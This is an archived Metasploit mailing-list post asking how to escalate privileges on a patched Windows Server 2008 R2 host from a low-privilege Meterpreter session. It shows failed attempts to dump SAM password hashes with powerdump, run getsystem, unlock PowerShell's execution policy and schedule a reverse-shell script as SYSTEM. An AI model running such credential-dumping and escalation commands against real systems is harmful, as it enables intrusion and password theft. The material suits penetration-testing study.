Metasploit mailing list archives
Powerdump / getsystem / privilege escalation on Windows 2008 R2
From: wfdawson <wfdawson () bellsouth net>
Date: Thu, 28 Apr 2011 09:49:22 -0700 (PDT)
Any hints on privilege escalation in Windows 2008 R2 fully patched as of today? Target is Windows Server 2008 R2. meterpreter > run powerdump [*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes... [*] Running PowerDump to extract Username and Password Hashes... [*] Uploaded PowerDump as 57501.ps1 to %TEMP%... [*] Setting ExecutionPolicy to Unrestricted... [*] Dumping the SAM database through PowerShell... [-] Error in script: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified. Getsystem fails, also. meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. I suppose I simply do not have sufficient privilege for either... meterpreter > getprivs ============================================================ Enabled Process Privileges ============================================================ SeChangeNotifyPrivilege My attempt to set the powershell script restriction policy manually reflects that: PS C:\> Set-ExecutionPolicy Unrestricted Set-ExecutionPolicy : Access to the registry key 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' is denied. At line:1 char:20 + Set-ExecutionPolicy <<<< Unrestricted + CategoryInfo : NotSpecified: (:) [Set-ExecutionPolicy], UnauthorizedAccessException + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand meterpreter > run scheduleme -c "C:\\User\\Metasploit\\revshell.vbs" -i -u system [*] Meterpreter is not running under sufficient administrative rights.
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- pricing mario_c (Apr 28)
- Re: pricing Matt Gardenghi (Apr 28)
- Re: pricing mario_c (Apr 28)
- Powerdump / getsystem / privilege escalation on Windows 2008 R2 wfdawson (Apr 28)
- Re: pricing Matt Gardenghi (Apr 28)